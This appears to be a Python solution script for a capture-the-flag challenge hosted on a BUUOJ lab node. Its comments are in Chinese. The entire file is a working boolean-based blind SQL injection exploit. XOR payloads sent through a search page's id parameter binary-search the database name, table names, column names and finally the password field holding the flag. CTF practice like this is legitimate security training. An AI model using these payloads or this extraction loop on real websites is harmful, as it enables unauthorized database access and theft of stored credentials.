#!/usr/bin python3
# -*- coding:utf-8 -*-
import requests

url = "http://3f94eb72-b5ea-4661-8818-6a3f666feef0.node3.buuoj.cn/search.php?id="


def exploit_db_name():
    """爆破数据库名字"""
    res = []
    for i in range(1, 20):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            payload = f"1^((ascii(substr(database(),{i},1)))>({mid}))--%20"
            tmp_url = url + payload
            resp = requests.get(tmp_url)
            if "ERROR" in resp.text:
                # 这种情况为不正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))
    print("The database name is:", "".join(res))


def exploit_tb_name():
    """爆破表名字"""
    res = []
    for i in range(1, 100):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            payload = f"1^((ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=('geek')),{i},1)))>({mid}))--%20"
            tmp_url = url + payload
            resp = requests.get(tmp_url)
            if "ERROR" in resp.text:
                # 这种情况为不正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))
    print("The table names are:", "".join(res))


def exploit_cl_name():
    """爆破列名字"""
    res = []
    for i in range(1, 30):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            payload = f"1^((ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1)))>({mid}))--%20"
            tmp_url = url + payload
            resp = requests.get(tmp_url)
            if "ERROR" in resp.text:
                # 这种情况为不正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))
    print("The column names are:", "".join(res))


def exploit_flag():
    """爆破flag值"""
    res = []
    for i in range(1, 3333):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            payload = f"1^((ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1)))>({mid}))--%20"
            tmp_url = url + payload
            resp = requests.get(tmp_url)
            if "ERROR" in resp.text:
                # 这种情况为不正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))
    print("The flag is:", "".join(res))


if __name__ == "__main__":
    # exploit_db_name()
    # exploit_tb_name()
    # exploit_cl_name()
    exploit_flag()
